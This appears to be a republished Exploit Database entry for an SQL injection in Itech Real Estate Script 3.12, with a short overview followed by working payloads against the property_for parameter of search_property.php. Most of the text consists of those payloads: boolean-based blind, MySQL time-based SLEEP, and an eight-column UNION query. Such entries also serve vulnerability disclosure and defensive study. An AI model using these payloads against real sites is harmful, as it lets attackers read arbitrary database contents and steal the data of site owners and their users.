Itech Real Estate Script 3.12 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Kaan KAMIS
  日期： 2017-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41195/

• Exploit Title: Itech Real Estate Script v3.12 – SQL Injection
  Date: 30.01.2017
  Vendor Homepage: http://itechscripts.com/
  Software Link: http://itechscripts.com/real-estate-script/
  Exploit Author: Kaan KAMIS
  Contact: iletisim[at]k2an[dot]com
  Website: http://k2an.com
  Category: Web Application Exploits
  
  Overview
  
  Itech Real Estate Script v3.12 is a robust platform for launching real-estate portals. This script is currently available under a special pricing of US$199.
  
  Type of vulnerability:
  
  An SQL Injection vulnerability in Itech Real Estate Script v3.12 allows attackers to read
  arbitrary data from the database.
  
  Vulnerability:
  
  http://localhost/real-estate-script/search_property.php?property_for=1[payload]
  
  Parameter: property_for (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: property_for=1 AND 4574=4574
  
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind
  Payload: property_for=1 AND SLEEP(5)
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 8 columns
  Payload: property_for=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176707a71,0x65546e587a4d65446c625876704b7a784d6651575074684f516f43486d716f5844664870577a6d43,0x7178626b71)-- zLWo